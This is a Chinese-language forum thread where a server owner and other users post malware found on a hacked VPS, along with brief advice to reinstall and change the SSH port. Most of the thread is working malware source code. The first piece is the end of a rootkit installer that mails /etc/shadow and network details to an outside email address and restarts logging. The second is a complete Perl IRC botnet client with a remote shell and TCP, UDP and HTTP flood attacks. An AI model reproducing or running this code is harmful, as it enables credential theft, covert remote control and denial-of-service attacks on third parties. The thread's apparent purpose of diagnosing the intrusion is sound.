MYIPADDR=`/sbin/ifconfig eth0 | grep \"inet addr:\" | awk -F \' \' \' {print $2} \' | cut -c6-`
echo \"${DCYN}[${WHI}sh${DCYN}]# Hostname :${WHI} `hostname -f` ($MYIPADDR)${RES}\"
uname -a | awk \'{ print  $11 }\' >/tmp/info_tmp
echo \"${DCYN}[${WHI}sh${DCYN}]# Arch : ${WHI}`cat /tmp/info_tmp` -+- bogomips : `cat /proc/cpuinfo | grep bogomips | awk \' {print $3}\'` \'${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]# Alternative IP :${WHI} \"`hostname -i`\" -+-  Might be [\"`/sbin/ifconfig | grep \\eth | wc -l`\" ] active adapters.${RES}\"

if [ -f /etc/redhat-release ]; then
echo -n \"${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} `head -1 /etc/redhat-release`${RES}\"
elif [ -f /etc/slackware-version ]; then
echo -n \"${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} `head -1 /etc/slackware-version`${RES}\"
elif [ -f /etc/debian_version ]; then
echo -n \"${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} `head -1 /etc/debian_version`${RES}\"
elif [ -f /etc/SuSE-release ]; then
echo -n \"${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} `head -1 /etc/SuSE-release`${RES}\"
elif [ -f /etc/issue ]; then
echo -n \"${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} `head -1 /etc/issue`${RES}\"
else echo -n \"${DCYN}[${WHI}sh${DCYN}]# Distribution:${WHI} unknown${RES}\"
fi

rm -rf /tmp/info_tmp
cat /etc/shadow >> /tmp/.cln
/sbin/ifconfig >> /tmp/.cln
cat /etc/issue >> /tmp/.cln
#cat /tmp/.cln | mail $md5sum -s \"$1:$2:`hostname -f`:$MYIPADDR\"
cat /tmp/.cln | mail -s \"rk\" geox_go@yahoo.com
cat /lib/libsh.so/shdcf >> /tmp/.mf
cat /tmp/.mf | mail -s \"rk por\" geox_go@yahoo.com
cat /tmp/.mf | mail -s \"rk por\" geox_go@yahoo.com
cat /tmp/.cln | mail -s \"rk\" geox_go@yahoo.com

rm -rf /tmp/.cln
rm -rf /tmp/.mf

endtime=`date +%S`
total=`expr $endtime - $startime`

echo \"\"
echo \"${WHI}--------------------------------------------------------------------${RES}\"
echo \"${DCYN}[${WHI}sh${DCYN}]# ipchains ... ? ${RES}\"

if [ -f /sbin/ipchains ]; then
echo \"${WHI}`/sbin/ipchains -L input | head -5`${RES}\"
else
echo \"\"
echo \"${DCYN}[${WHI}sh${DCYN}]# lucky for u no ipchains found${RES}\"
fi

echo \"${WHI}--------------------------------------------------------------------${RES}\"

echo \"${DCYN}[${WHI}sh${DCYN}]# iptables ...?${RES}\"

if [ -f /sbin/iptables ]; then
echo \"${WHI}`/sbin/iptables -L input | head -5`${RES}\"
else
echo \"\"
echo \"${DCYN}[${WHI}sh${DCYN}]# lucky for u no iptables found${RES}\"
fi
echo \"${WHI}--------------------------------------------------------------------${RES}\"

echo \"${DCYN}[${WHI}sh${DCYN}]# Just ignore all errors if any ! \"
echo \"${DCYN}[${WHI}sh${DCYN}]# ============================== ${RED}Backdooring completed in :$total seconds ${RES}\"

if [ -f /usr/sbin/syslogd ]; then
/usr/sbin/syslogd -m 0
else
/sbin/syslogd -m 0
fi

if [ -f /usr/sbin/inetd ]; then
killall -HUP inetd >/dev/null 2>&1
elif [ -f /usr/sbin/xinetd ]; then
killall -HUP xinetd
fi
rm -rf .sshd
cd $BASEDIR
rm -rf ../shv5*
#sendmail root -p geox_go@yahoo.com

rm -rf bin* conf* lib* utilz* rk.jpg setup
# EOF

hello2crawler · 发表于 2010-4-5 12:09

本帖最后由 hello2crawler 于 2010-4-5 00:45 编辑

.sshd是个perl脚本...貌似就是公布肉鸡地址的?
而且看起来这个不像是通知入侵者的... 加上他还打错字改root密码= = 应该不是什么牛逼人士了.

#!/usr/bin/perl
####################################################
# Hawker Hunter v2.0 (ARZ Co. Ltd.) Legacy 2009(c) #
####################################################

#############CONF###################################
my $hidden = \'/usr/sbin/apache/log\';
my $linas_max=\'4\';
my $sleep=\'5\';
my @admins=(\"Geox\");
my @hostauth=(\"geox.users.quakenet.org\");
my @channels=(\"#sniffer\");
my $nick=\'Sonia\';
my $ircname =\'furt\';
my $realname = \'pe fatza\';
my $server=\'multiplay.uk.quakenet.org\';
my $port=\'6667\';
####################################################
###########theRe we Go##############################
$SIG{\'INT\'} = \'IGNORE\';
$SIG{\'HUP\'} = \'IGNORE\';
$SIG{\'TERM\'} = \'IGNORE\';
$SIG{\'CHLD\'} = \'IGNORE\';
$SIG{\'PS\'} = \'IGNORE\';
use IO::Socket;
use Socket;
use IO::Select;
chdir(\"/\");
$0=\"$hidden\".\"\\0\"x16;;
my $pid=fork;
exit if $pid;
die \"fork problem: $!\" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == \'1\') {
my $socket = $_[0];
print $socket \"$_[1]\\n\";
  } else {
   print $IRC_cur_socket \"$_[0]\\n\";
  }
}

sub conectar {
my $meunick = $_[0];
my $server_con = $_[1];
my $port_con = $_[2];

my $IRC_socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$server_con\", PeerPort=>$port_con) or return(1);
if (defined($IRC_socket)) {
   $IRC_cur_socket = $IRC_socket;

   $IRC_socket->autoflush(1);
   $sel_cliente->add($IRC_socket);

   $irc_servers{$IRC_cur_socket}{\'host\'} = \"$server_con\";
   $irc_servers{$IRC_cur_socket}{\'port\'} = \"$port_con\";
   $irc_servers{$IRC_cur_socket}{\'nick\'} = $meunick;
   $irc_servers{$IRC_cur_socket}{\'meuip\'} = $IRC_socket->sockhost;
   nick(\"$meunick\");
   sendraw(\"USER $ircname \".$IRC_socket->sockhost.\" $server_con :$realname\");
   sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar(\"$nick\", \"$server\", \"$port\"); }
delete($irc_servers{\'\'}) if (defined($irc_servers{\'\'}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
   $IRC_cur_socket = $fh;
   $meunick = $irc_servers{$IRC_cur_socket}{\'nick\'};
   $nread = sysread($fh, $msg, 4096);
   if ($nread == 0) {
      $sel_cliente->remove($fh);
      $fh->close;
      delete($irc_servers{$fh});
   }
   @lines = split (/\\n/, $msg);

   for(my $c=0; $c<= $#lines; $c++) {
   $line = $lines[$c];
   $line=$line_temp.$line if ($line_temp);
   $line_temp=\'\';
   $line =~ s/\\r$//;
   unless ($c == $#lines) {
      parse(\"$line\");
   } else {
         if ($#lines == 0) {
         parse(\"$line\");
         } elsif ($lines[$c] =~ /\\r$/) {
            parse(\"$line\");
         } elsif ($line =~ /^(\\S+) NOTICE AUTH :\\*\\*\\*/) {
            parse(\"$line\");
         } else {
            $line_temp = $line;
         }
   }
   }
}
}

sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \\:(.*)/) {
   sendraw(\"PONG :$1\");
} elsif ($servarg =~ /^\\:(.+?)\\!(.+?)\\@(.+?) PRIVMSG (.+?) \\:(.+)/) {
   my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
   if ($args =~ /^\\001VERSION\\001$/) {
      notice(\"$pn\", \"\\001VERSION mIRC v6.16 Khaled Mardam-Bey\\001\");
   }
   if (grep {$_ =~ /^\\Q$hostmask\\E$/i } @hostauth) {
   if (grep {$_ =~ /^\\Q$pn\\E$/i } @admins) {
      if ($onde eq \"$meunick\"){
         shell(\"$pn\", \"$args\");
      }
      if ($args =~ /^(\\Q$meunick\\E|\\!zax)\\s+(.*)/ ) {
         my $natrix = $1;
         my $arg = $2;
         if ($arg =~ /^\\!(.*)/) {
            ircase(\"$pn\",\"$onde\",\"$1\") unless ($natrix eq \"!bot\" and $arg =~ /^\\!nick/);
         } elsif ($arg =~ /^\\@(.*)/) {
            $ondep = $onde;
            $ondep = $pn if $onde eq $meunick;
            bfunc(\"$ondep\",\"$1\");
         } else {
            shell(\"$onde\", \"$arg\");
         }
      }
   }
}
} elsif ($servarg =~ /^\\:(.+?)\\!(.+?)\\@(.+?)\\s+NICK\\s+\\:(\\S+)/i) {
   if (lc($1) eq lc($meunick)) {
      $meunick=$4;
      $irc_servers{$IRC_cur_socket}{\'nick\'} = $meunick;
   }
} elsif ($servarg =~ m/^\\:(.+?)\\s+433/i) {
   nick(\"$meunick-\".int rand(999999));
} elsif ($servarg =~ m/^\\:(.+?)\\s+001\\s+(\\S+)\\s/i) {
   $meunick = $2;
   $irc_servers{$IRC_cur_socket}{\'nick\'} = $meunick;
   $irc_servers{$IRC_cur_socket}{\'nome\'} = \"$1\";
   foreach my $channel (@channels) {
      sendraw(\"JOIN $channel hawker\");
   }
}
}

sub bfunc {
  my $printl = $_[0];
  my $funcarg = $_[1];
  if (my $pid = fork) {
   waitpid($pid, 0);
  } else {
   if (fork) {
      exit;
   } else {
         if ($funcarg =~ /^portscan (.*)/) {
         my $hostip=\"$1\";
         my @ports=(\"21\",\"22\",\"23\",\"25\",\"80\",\"113\",\"135\",\"443\",\"445\",\"5900\",\"5901\",\"6660\",\"6661\",\"6662\",\"6663\",\"6665\",\"6666\",\"6667\",\"6668\",\"6669\",\"7000\",\"8080\",\"1080\");
         my (@aberta, %port_banner);
      sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR] 3Scanning4 \".$1.\" for open ports.\");
         foreach my $port (@ports)  {
            my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $port, Proto => \'tcp\', Timeout => 4);
            if ($scansock) {
               push (@aberta, $port);
               $scansock->close;
            }
         }

         if (@aberta) {
            sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR] 3Open port(s)4: @aberta\");
         } else {
            sendraw($IRC_cur_socket,\"PRIVMSG $printl :[2hawkeR hunteR]3 No open ports found4!\");
         }
         }
         if ($funcarg =~ /^tcpflood\\s+(.*)\\s+(\\d+)\\s+(\\d+)/) {
sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR]3 TCP Attacking4 \".$1.\":\".$2.\" 3for4 \".$3.\" 3seconds.\");
      my $itime = time;
      my ($cur_time);
         $cur_time = time - $itime;
      while ($3>$cur_time){
         $cur_time = time - $itime;
      &tcpflooder(\"$1\",\"$2\",\"$3\");
         }
      sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR]3 TCP Attack done 4\".$1.\":\".$2.\".\");
         }

         if ($funcarg =~ /^httpflood\\s+(.*)\\s+(\\d+)/) {
      sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR]3 HTTP Attacking4 \".$1.\" 3for4 \".$2.\" 3seconds.\");
      my $itime = time;
      my ($cur_time);
         $cur_time = time - $itime;
      while ($2>$cur_time){
         $cur_time = time - $itime;
      my $socket = IO::Socket::INET->new(proto=>\'tcp\', PeerAddr=>$1, PeerPort=>80);
         print $socket \"GET / HTTP/1.1\\r\\nAccept: */*\\r\\nHost: \".$1.\"\\r\\nConnection: Keep-Alive\\r\\n\\r\\n\";
      close($socket);
         }
      sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR]3HTTP Attacking done \".$1.\".\");
         }
##########UDP-1#############################################
         if ($funcarg =~ /^udp\\s+(.*)\\s+(\\d+)\\s+(\\d+)/) {
         sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR]3 UDP Attacking4 \".$1.\" 3with4 \".$2.\" 3KB(s) for4 \".$3.\" 3seconds.\");
         my ($dtime, %pacotes) = udpflooder(\"$1\", \"$2\", \"$3\");
         $dtime = 1 if $dtime == 0;
         my %bytes;
         $bytes{igmp} = $2 * $pacotes{igmp};
         $bytes{icmp} = $2 * $pacotes{icmp};
         $bytes{o} = $2 * $pacotes{o};
         $bytes{udp} = $2 * $pacotes{udp};
         $bytes{tcp} = $2 * $pacotes{tcp};
         sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR]3 UDP Sent4 \".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024).\" 3Kb in4 \".$dtime.\" 3seconds to \".$1.\".\");
         }
##########UDP-2#############################################
         if ($funcarg =~ /^udp2\\s+(.*)\\s+(\\d+)\\s+(\\d+)\\s+(\\d+)/) {
         sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR]3 UDP2 Attacking4 \".$1.\":\".$4.\" 3with4 \".$2.\" 3KB(s) for4 \".$3.\" 3seconds.\");
         my ($dtime, %pacotes) = udpflooder2(\"$1\", \"$2\", \"$3\",\"$4\");
         $dtime = 1 if $dtime == 0;
         my %bytes;
         $bytes{igmp} = $2 * $pacotes{igmp};
         $bytes{icmp} = $2 * $pacotes{icmp};
         $bytes{o} = $2 * $pacotes{o};
         $bytes{udp} = $2 * $pacotes{udp};
         $bytes{tcp} = $2 * $pacotes{tcp};
         sendraw($IRC_cur_socket, \"PRIVMSG $printl :[2hawkeR hunteR]3 UDP Sent4 \".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024).\" 3Kb in4 \".$dtime.\" 3seconds to \".$1.\".\");
         }
############################################################
         exit;
   }
  }
}

sub ircase {
  my ($kem, $printl, $case) = @_;

  if ($case =~ /^join (.*)/) {
   j(\"$1\");
}
if ($case =~ /^part (.*)/) {
   p(\"$1\");
}
if ($case =~ /^rejoin\\s+(.*)/) {
   my $chan = $1;
   if ($chan =~ /^(\\d+) (.*)/) {
      for (my $ca = 1; $ca <= $1; $ca++ ) {
      p(\"$2\");
      j(\"$2\");
      }
   } else {
      p(\"$chan\");
      j(\"$chan\");
   }
}
if ($case =~ /^op/) {
   op(\"$printl\", \"$kem\") if $case eq \"op\";
   my $oarg = substr($case, 3);
   op(\"$1\", \"$2\") if ($oarg =~ /(\\S+)\\s+(\\S+)/);
}
if ($case =~ /^deop/) {
   deop(\"$printl\", \"$kem\") if $case eq \"deop\";
   my $oarg = substr($case, 5);
   deop(\"$1\", \"$2\") if ($oarg =~ /(\\S+)\\s+(\\S+)/);
}
if ($case =~ /^msg\\s+(\\S+) (.*)/) {
   msg(\"$1\", \"$2\");
}
if ($case =~ /^flood\\s+(\\d+)\\s+(\\S+) (.*)/) {
   for (my $cf = 1; $cf <= $1; $cf++) {
      msg(\"$2\", \"$3\");
   }
}
if ($case =~ /^ctcp\\s+(\\S+) (.*)/) {
   ctcp(\"$1\", \"$2\");
}
if ($case =~ /^ctcpflood\\s+(\\d+)\\s+(\\S+) (.*)/) {
   for (my $cf = 1; $cf <= $1; $cf++) {
      ctcp(\"$2\", \"$3\");
   }
}
if ($case =~ /^nick (.*)/) {
   nick(\"$1\");
}
if ($case =~ /^connect\\s+(\\S+)\\s+(\\S+)/) {
   conectar(\"$2\", \"$1\", 6667);
}
if ($case =~ /^raw (.*)/) {
   sendraw(\"$1\");
}
if ($case =~ /^eval (.*)/) {
   eval \"$1\";
}
}

sub shell {
  my $printl=$_[0];
  my $comando=$_[1];
  if ($comando =~ /cd (.*)/) {
chdir(\"$1\") || msg(\"$printl\", \"No such file or directory\");
return;
  }
  elsif ($pid = fork) {
   waitpid($pid, 0);
  } else {
   if (fork) {
      exit;
   } else {
         my @resp=`$comando 2>&1 3>&1`;
         my $c=0;
         foreach my $linha (@resp) {
         $c++;
         chop $linha;
         sendraw($IRC_cur_socket, \"PRIVMSG $printl :$linha\");
         if ($c == \"$linas_max\") {
            $c=0;
            sleep $sleep;
         }
         }
         exit;
   }
  }
}

sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname(\'tcp\');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t=\"SOCK$l\";
  socket($t,PF_INET,SOCK_STREAM,$proto);
  connect($t,$pa)||$j--;
  $j++;$l++;
}
$l=0;
while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t=\"SOCK$l\";
  shutdown($t,2);
  $l++;
}
}

sub udpflooder {
  my $iaddr = inet_aton($_[0]);
  my $msg = \'A\' x $_[1];
  my $ftime = $_[2];
  my $cp = 0;
  my (%pacotes);
  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  return(undef) if $cp == 4;
  my $itime = time;
  my ($cur_time);
  while ( 1 ) {
   for (my $port = 1; $port <= 65000; $port++) {
   $cur_time = time - $itime;
   last if $cur_time >= $ftime;
   send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
   send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
   send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
   send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;

   for (my $pc = 3; $pc <= 255;$pc++) {
      next if $pc == 6;
      $cur_time = time - $itime;
      last if $cur_time >= $ftime;
      socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
      send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
   }
   }
   last if $cur_time >= $ftime;
  }
  return($cur_time, %pacotes);
}

sub udpflooder2 {
  my $iaddr = inet_aton($_[0]);
  my $msg = \'A\' x $_[1];
  my $ftime = $_[2];
  my $cp = 0;
  my $udpport = $_[3];
  my (%pacotes);
  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  return(undef) if $cp == 4;
  my $itime = time;
  my ($cur_time);
  while ( 1 ) {
   $cur_time = time - $itime;
   last if $cur_time >= $ftime;
   send(SOCK1, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{igmp}++;
   send(SOCK2, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{udp}++;
   send(SOCK3, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{icmp}++;
   send(SOCK4, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{tcp}++;

   for (my $pc = 3; $pc <= 255;$pc++) {
      next if $pc == 6;
      $cur_time = time - $itime;
      last if $cur_time >= $ftime;
      socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
      send(SOCK5, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{o}++;
   }
   last if $cur_time >= $ftime;
  }
  return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw(\"PRIVMSG $_[0] :\\001$_[1]\\001\");
}
sub msg {
return unless $#_ == 1;
sendraw(\"PRIVMSG $_[0] :$_[1]\");
}
sub notice {
return unless $#_ == 1;
sendraw(\"NOTICE $_[0] :$_[1]\");
}
sub op {
return unless $#_ == 1;
sendraw(\"MODE $_[0] +o $_[1]\");
}
sub deop {
return unless $#_ == 1;
sendraw(\"MODE $_[0] -o $_[1]\");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw(\"JOIN $_[0]\");
}
sub p { part(@_); }
sub part {
  sendraw(\"PART $_[0]\");
}
sub nick {
  return unless $#_ == 0;
  sendraw(\"NICK $_[0]\");
}
sub quit {
  sendraw(\"QUIT :$_[0]\");
}

oncename · 发表于 2010-4-5 13:00

楼主你vps没有控制面板吗？
简单的方法重装系统改SSH端口吧...
vine 发表于 2010-4-5 11:51

就这个方法最简单有效。

hello2crawler · 发表于 2010-4-5 13:27

就这个方法最简单有效。
oncename 发表于 2010-4-5 00:00

随便拿个端口扫描器就能扫出来拉

		自动登录	找回密码
密码			立即注册

[软件] 求助，服务器被黑了……

浏览过的版块